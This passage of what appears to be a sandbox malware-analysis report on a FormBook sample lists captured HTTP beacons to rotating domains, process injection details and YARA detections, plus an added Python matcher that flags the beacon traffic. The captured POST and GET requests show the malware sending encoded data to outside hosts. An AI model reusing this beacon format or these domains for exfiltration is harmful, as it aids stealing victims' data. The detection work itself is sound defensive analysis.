                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                            Data Raw: 4d 6c 31 38 53 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 75 47 47 51 6d 48 6e 65 68 77 6d 5a 56 51 49 75 53 53 6b 43 36 6a 39 58 2b 64 71 4d 43 73 75 50 66 6c 35 72 65 71 41 4a 46 36 75 58 58 47 75 38 6e 64 4a 71 34 34 2f 51 7a 2f 38 61 39 39 33 48 42 46 31 47 46 72 51 30 50 48 46 6a 58 59 4f 47 69 57 37 30 69 66 45 7a 4e 2b 62 52 59 64 78 79 47 41 7a 37 6b 6e 44 7a 76 44 61 6a 73 6a 66 47 58 54 45 35 50 77 4b 4e 6c 42 7a 39 36 53 45 6f 66 72 6d 54 30 79 67 6c 2f 73 42 71 66 55 71 35 64 77 4d 30 36 52 41 4c 34 75 6b 49 49 4d 65 5a 33 77 34 32 47 2b 51 36 51 78 76 34 39 4b 6b 79 52 6f 47 37 38 34 48 31 4a 4c 6b 48 36 72 2f 74 6c 72 79 79 4c 4b 47 4c 79 70 55 3d
                                                                            Data Ascii: Ml18S=WMd0CYxlLH1juGGQmHnehwmZVQIuSSkC6j9X+dqMCsuPfl5reqAJF6uXXGu8ndJq44/Qz/8a993HBF1GFrQ0PHFjXYOGiW70ifEzN+bRYdxyGAz7knDzvDajsjfGXTE5PwKNlBz96SEofrmT0ygl/sBqfUq5dwM06RAL4ukIIMeZ3w42G+Q6Qxv49KkyRoG784H1JLkH6r/tlryyLKGLypU=
Nov 22, 2024 07:52:15.474142075 CET | 367 | IN | HTTP/1.1 404 Not Found
                                                                            Date: Fri, 22 Nov 2024 06:52:15 GMT
                                                                            Server: Apache
                                                                            Content-Length: 203
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>

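The sessions in this section all share one shape: a POST (or, in session 16, a GET) to the short path /fo8o/ on a domain the sample cycles through, a body consisting of exactly one form field (Ml18S) whose value is unescaped base64, Origin and Referer headers that simply echo the Host, the same fixed MSIE 8.0 User-Agent on every request, Cache-Control: no-cache and Connection: close, answered each time by a 404 from an unrelated or parked server. The matcher below is an added example written for this page; it is neither Joe Sandbox code nor anything recovered from the FormBook sample. It parses a raw HTTP request and scores those visible markers. The User-Agent string, the session 13 POST and the session 16 GET are copied verbatim from the capture; the benign login request is constructed for contrast, and the length bounds on the path and field name, the min_hits threshold and the indicator names are this example's own assumptions. The encoded payload is deliberately left opaque: the code only checks that it is well-formed base64 and reports its decoded length.

```python
"""Heuristic matcher for the HTTP beacons captured in this report (added example)."""
import base64
import binascii
import re
from typing import Optional

# User-Agent copied verbatim from the captured requests.
BEACON_UA = ("Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; "
             ".NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; "
             "Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)")
# Length bounds are assumptions tuned to the "/fo8o/" path and "Ml18S" field seen above.
BEACON_PATH = re.compile(r"^/[A-Za-z0-9]{3,6}/$")
# Exactly one field. '+' and '/' are sent raw, so the body is NOT run through
# urllib.parse.parse_qs, which would turn '+' into a space and break the base64 check.
ONE_FIELD = re.compile(r"^([A-Za-z0-9]{3,8})=([A-Za-z0-9+/]+={0,2})$")
QUERY_FORM = re.compile(r"^(/[A-Za-z0-9]{3,6}/)\?([A-Za-z0-9]{3,8})=([A-Za-z0-9+/]+={0,2})"
                        r"(?:&[A-Za-z0-9]{3,8}=[A-Za-z0-9+/=]+)?$")


def parse_request(raw: str) -> dict:
    """Split a raw HTTP/1.x request into method, target, lower-cased headers and body."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if not line:
            continue
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "headers": headers, "body": body.strip()}


def match_beacon(raw: str, min_hits: int = 3) -> Optional[dict]:
    """Return a summary when the request has the beacon shape, otherwise None."""
    req = parse_request(raw)
    h = req["headers"]
    if req["method"] == "POST":
        m = ONE_FIELD.match(req["body"])
        if not (BEACON_PATH.match(req["target"]) and m):
            return None
        path, field, value = req["target"], m.group(1), m.group(2)
    elif req["method"] == "GET":
        m = QUERY_FORM.match(req["target"])
        if not m:
            return None
        path, field, value = m.group(1), m.group(2), m.group(3)
    else:
        return None
    try:
        blob = base64.b64decode(value, validate=True)  # contents stay opaque
    except (binascii.Error, ValueError):
        return None

    host = h.get("host", "")
    hits = ["single base64 field on short path"]
    if h.get("user-agent") == BEACON_UA:
        hits.append("fixed MSIE 8.0 User-Agent")
    if h.get("connection", "").lower() == "close":
        hits.append("Connection: close")
    if req["method"] == "POST":
        if h.get("origin") == f"http://{host}":
            hits.append("Origin echoes Host")
        if h.get("referer") == f"http://{host}{path}":
            hits.append("Referer echoes Host and path")
        if h.get("cache-control", "").lower() == "no-cache":
            hits.append("Cache-Control: no-cache")
    if len(hits) < min_hits:
        return None
    return {"method": req["method"], "host": host, "path": path, "field": field,
            "payload_len": len(blob), "indicators": hits}


# Session 13 POST and session 16 GET, copied from the capture above.
SESSION_13 = "\r\n".join([
    "POST /fo8o/ HTTP/1.1",
    "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
    "Accept-Language: en-US,en", "Accept-Encoding: gzip, deflate, br",
    "Host: www.techchains.info", "Origin: http://www.techchains.info",
    "Cache-Control: no-cache", "Connection: close",
    "Content-Type: application/x-www-form-urlencoded", "Content-Length: 202",
    "Referer: http://www.techchains.info/fo8o/", "User-Agent: " + BEACON_UA, "",
    "Ml18S=ic393dm3l8hWiK4S2aitxP9OmTK5tVWsV1GRlJ9Iam83VjgbJMEaXIugWKDn1ZunGza80y/mGt5SbFWrBuoBaLk79nXfQGFVXVaOK5jQiNiiHgHnntY4TpiiPm63TAhfYe1zJtoTtPEgM8aqbVmXX5BfT1Qw5zeXI+S/aSRuDjILeR0c4VkjjVNdy2ZhjPusfQ==",
])
SESSION_16 = "\r\n".join([
    "GET /fo8o/?Ml18S=vefd0teQh+kbruh+h6aX8PBfjiL7oFyRDgCUoL90YCYLczV+Hcc/TcCCUPfrz9W5FQiF6ivoXpNecnmrfO5hd7w81ULHWk02cFWPIOqV4u3afmCGnKNzdpU=&nVb4=q2L0IduHqXQ8JBmp HTTP/1.1",
    "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
    "Accept-Language: en-US,en", "Host: www.techchains.info", "Connection: close",
    "User-Agent: " + BEACON_UA, "", "",
])
# Constructed benign login request for contrast (not from the capture).
BENIGN_LOGIN = "\r\n".join([
    "POST /login HTTP/1.1", "Host: intranet.example.test",
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/132.0",
    "Content-Type: application/x-www-form-urlencoded", "Content-Length: 30",
    "Connection: keep-alive", "", "user=alice&password=hunter2%21",
])

if __name__ == "__main__":
    for name, raw in [("session 13", SESSION_13), ("session 16", SESSION_16), ("benign", BENIGN_LOGIN)]:
        print(name, "->", match_beacon(raw))
```

Session 13 scores all six indicators and session 16 only three (the GET carries no Origin, Referer or Cache-Control), which is why the threshold defaults to three rather than requiring the full POST header set; the User-Agent string is the single most specific marker, but the Origin/Referer echo and the one-field base64 body are what survive if an operator rotates the UA. The responses are not scored because, as the sessions above show, the servers behind the rotated domains answer with ordinary 404 pages that say nothing about the client.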

Session ID: 19
Source IP: 192.168.2.4   Source Port: 50022
Destination IP: 195.110.124.133   Destination Port: 80
PID: 5436
Process: C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe

Timestamp | Bytes transferred | Direction | Data
Nov 22, 2024 07:52:16.819015980 CET | 10899 | OUT | POST /fo8o/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                            Accept-Language: en-US,en
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.elettrosistemista.zip
                                                                            Origin: http://www.elettrosistemista.zip
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 10302
                                                                            Referer: http://www.elettrosistemista.zip/fo8o/
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                            Data Ascii: Ml18S=WMd0CYxlLH1juGGQmHnehwmZVQIuSSkC6j9X+dqMCvOPcXxrdJoJE6uXemuhndI244nMz/wK9+fHBmtGDek0YXFjY4OL/m7bifU3N+rRYdxyGC77j2DzpDagrjfKFjFePwi3lB2G5ikofL2T2H8lj8BocUr6dwAn6RMH4qsmIMqZ02VtWPomLCf/t60RUoqs9YuQKa4o5prDvMH9SbShjeH+23Z5Z0sc0tJoE0TRN0WvpehAjnlq7FsOYFqGLaKNepWEA2+B+DCR1sC5rubdTH9HEmShKg7uRpuYCrniyZOxx+fw8hdm0hVXoNmxqIYG/i1Z4+H/juMFpdnN89VHxi9Jaw2sh9CJtt+C8Sr1Z+wRy6TYReB5ys/dgCKdsxeFltjZCAFlR5VrM/1wLjkKF7adGqPCLL0d6uoU+eDO0hvKYenTQgmZYHEe7+UHsu7TbsYxpgNn4i4AD48jePo5nIOTt5WZ8qQEK9l6v8jw+L3ZPIkNmIKTn8l0QHC66zVtxqxlwhPsJONRF5FAwRxuYLLuQ1AOQBB41G1JstARWEryL4EWLo8zBHXMNllACaAZFn5DU9b+ORBkDKjbAun2+jQdpx3k59oRagJTgQRC42PnmyV724DU3eHzPcw3jHkhDTBMUu50+QeZwRo8k7ZmO+LkzJBi9hX2cfvkbkEZd4sgtXZmtGbW7zV0o2kw2jakmpjgYjUGXpPQpEVV2MLERunr2S6kdI28PkpXxDFDpxI2ot5wnZD1uv/gRMCUeLXN8foAD2fi2+6XdpFXTlAb08OkXYVy3T2zFUJqP/ic/54OhEflwYIgGCNHa0xouhuieOTsEX53hl7k6RUj+gkXp5Cu3+MpVQV3aqO1ZUp9WF1xfNy1ZqrPB2m6U9YSJR1cNzgRyM7Vo3xo3OeObcpYXhPl0lUg0qc5YNT73BhEKXxkc/wP7N6sojl/DTcsdpZgnfc1gQI2iGwx8sfZCGdjOVKcvA0Br8ZGbFgYA1ebCJMSFM [TRUNCATED]
                                                                            Nov 22, 2024 07:52:18.324264050 CET | 367 | IN | HTTP/1.1 404 Not Found
                                                                            Date: Fri, 22 Nov 2024 06:52:17 GMT
                                                                            Server: Apache
                                                                            Content-Length: 203
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            20 | 192.168.2.4 | 50023 | 195.110.124.133 | 80 | 5436 | C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Nov 22, 2024 07:52:19.474291086 CET | 521 | OUT | GET /fo8o/?nVb4=q2L0IduHqXQ8JBmp&Ml18S=bO1UBvtoHFNUmlWB4HLJpEjmeTUqQxU1qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMLzFMa6Onx1WMpNg/TOHpJ+sdeDHYknqJlyE= HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                            Accept-Language: en-US,en
                                                                            Host: www.elettrosistemista.zip
                                                                            Connection: close
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                            Nov 22, 2024 07:52:20.826541901 CET | 367 | IN | HTTP/1.1 404 Not Found
                                                                            Date: Fri, 22 Nov 2024 06:52:20 GMT
                                                                            Server: Apache
                                                                            Content-Length: 203
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            21 | 192.168.2.4 | 50024 | 217.196.55.202 | 80 | 5436 | C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Nov 22, 2024 07:52:43.390568018 CET | 785 | OUT | POST /fo8o/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                            Accept-Language: en-US,en
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.empowermedeco.com
                                                                            Origin: http://www.empowermedeco.com
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 202
                                                                            Referer: http://www.empowermedeco.com/fo8o/
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                            Data Ascii: Ml18S=rzPx9WPPN4oHTT64Dc3dI1wlWK2cTKU0a+tEGwteBm2uHo9nQQVpNP6tbz/W3QFGJi3wc7g+eYa29Cx/PhlLGFVT1qfUOqQVTpzLZCn+Y0XjHKp+5zkjI8iuPlQX3sXQGmlEtu/NizpUNIGgdPo3QRvUoOj+ho0JuvNrjum00ILaG2A9EhuHXhtN83j3R+WRkA==
                                                                            Nov 22, 2024 07:52:44.586931944 CET | 1085 | IN | HTTP/1.1 301 Moved Permanently
                                                                            Connection: close
                                                                            content-type: text/html
                                                                            content-length: 795
                                                                            date: Fri, 22 Nov 2024 06:52:44 GMT
                                                                            server: LiteSpeed
                                                                            location: https://www.empowermedeco.com/fo8o/
                                                                            platform: hostinger
                                                                            panel: hpanel
                                                                            content-security-policy: upgrade-insecure-requests
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            22 | 192.168.2.4 | 50025 | 217.196.55.202 | 80 | 5436 | C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Nov 22, 2024 07:52:46.041043043 CET | 805 | OUT | POST /fo8o/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                            Accept-Language: en-US,en
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.empowermedeco.com
                                                                            Origin: http://www.empowermedeco.com
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 222
                                                                            Referer: http://www.empowermedeco.com/fo8o/
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                            Data Ascii: Ml18S=rzPx9WPPN4oHTyK4G7rdOVwmaq2caqUwa+hEGxZ3BweuHKlnRRVpDv6tTT/TqgFJJi74c6M+eZ629Dh/PS9KHVVV+KfSAKQVTpzLZBapY0vjE6Z+5SkgFcitHFQX9MWZGmkRtsb3iwBUNJWgT6c0LhvOluihtJR+jP4elNiF5ZrkDwRnVQPQFhJ+hwqDc9rY/J2jmDX4mE7LNNJTJWekjko=
                                                                            Nov 22, 2024 07:52:47.290750980 CET | 1085 | IN | HTTP/1.1 301 Moved Permanently
                                                                            Connection: close
                                                                            content-type: text/html
                                                                            content-length: 795
                                                                            date: Fri, 22 Nov 2024 06:52:47 GMT
                                                                            server: LiteSpeed
                                                                            location: https://www.empowermedeco.com/fo8o/
                                                                            platform: hostinger
                                                                            panel: hpanel
                                                                            content-security-policy: upgrade-insecure-requests
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            23 | 192.168.2.4 | 50026 | 217.196.55.202 | 80 | 5436 | C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Nov 22, 2024 07:52:48.697500944 CET | 10887 | OUT | POST /fo8o/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                            Accept-Language: en-US,en
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.empowermedeco.com
                                                                            Origin: http://www.empowermedeco.com
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 10302
                                                                            Referer: http://www.empowermedeco.com/fo8o/
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                            Data Ascii: Ml18S= [TRUNCATED]
                                                                            Nov 22, 2024 07:52:49.939519882 CET | 1085 | IN | HTTP/1.1 301 Moved Permanently
                                                                            Connection: close
                                                                            content-type: text/html
                                                                            content-length: 795
                                                                            date: Fri, 22 Nov 2024 06:52:49 GMT
                                                                            server: LiteSpeed
                                                                            location: https://www.empowermedeco.com/fo8o/
                                                                            platform: hostinger
                                                                            panel: hpanel
                                                                            content-security-policy: upgrade-insecure-requests
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            24 | 192.168.2.4 | 50027 | 217.196.55.202 | 80 | 5436 | C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Nov 22, 2024 07:52:51.349225998 CET | 517 | OUT | GET /fo8o/?Ml18S=mxnR+iHPFb8HZiaGfeL/C2cRfJ+ne5kRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKfBV1+IPAGotTT7HDcUO7JjOgJKpj6i9KOMs=&nVb4=q2L0IduHqXQ8JBmp HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                            Accept-Language: en-US,en
                                                                            Host: www.empowermedeco.com
                                                                            Connection: close
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                            Nov 22, 2024 07:52:52.599158049 CET | 1234 | IN | HTTP/1.1 301 Moved Permanently
                                                                            Connection: close
                                                                            content-type: text/html
                                                                            content-length: 795
                                                                            date: Fri, 22 Nov 2024 06:52:52 GMT
                                                                            server: LiteSpeed
                                                                            location: https://www.empowermedeco.com/fo8o/?Ml18S=mxnR+iHPFb8HZiaGfeL/C2cRfJ+ne5kRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKfBV1+IPAGotTT7HDcUO7JjOgJKpj6i9KOMs=&nVb4=q2L0IduHqXQ8JBmp
                                                                            platform: hostinger
                                                                            panel: hpanel
                                                                            content-security-policy: upgrade-insecure-requests
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                            Target ID: 0
                                                                            Start time: 01:48:57
                                                                            Start date: 22/11/2024
                                                                            Path: C:\Users\user\Desktop\Certificate 11-21AIS.exe
                                                                            Wow64 process (32bit): true
                                                                            Commandline: "C:\Users\user\Desktop\Certificate 11-21AIS.exe"
                                                                            Imagebase: 0x8c0000
                                                                            File size: 1'189'888 bytes
                                                                            MD5 hash: 8B68068B577B39F51DEE9C3703AC8999
                                                                            Has elevated privileges: true
                                                                            Has administrator privileges: true
                                                                            Programmed in: C, C++ or other language
                                                                            Reputation: low
                                                                            Has exited: true

                                                                            Target ID:1
                                                                            Start time:01:48:59
                                                                            Start date:22/11/2024
                                                                            Path:C:\Windows\SysWOW64\svchost.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\Desktop\Certificate 11-21AIS.exe"
                                                                            Imagebase:0x660000
                                                                            File size:46'504 bytes
                                                                            MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1823875661.0000000003590000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1823875661.0000000003590000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1823341522.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1823341522.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1824475216.0000000005200000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1824475216.0000000005200000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:2
                                                                            Start time:01:49:05
                                                                            Start date:22/11/2024
                                                                            Path:C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe"
                                                                            Imagebase:0x980000
                                                                            File size:140'800 bytes
                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.4144911596.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.4144911596.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                            Reputation:high
                                                                            Has exited:false

                                                                            Target ID:3
                                                                            Start time:01:49:06
                                                                            Start date:22/11/2024
                                                                            Path:C:\Windows\SysWOW64\netbtugc.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\SysWOW64\netbtugc.exe"
                                                                            Imagebase:0x420000
                                                                            File size:22'016 bytes
                                                                            MD5 hash:EE7BBA75B36D54F9E420EB6EE960D146
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4143480328.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4143480328.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4143880613.0000000003030000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4143880613.0000000003030000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4144988043.0000000003170000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4144988043.0000000003170000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                            Reputation:moderate
                                                                            Has exited:false

                                                                            Target ID:5
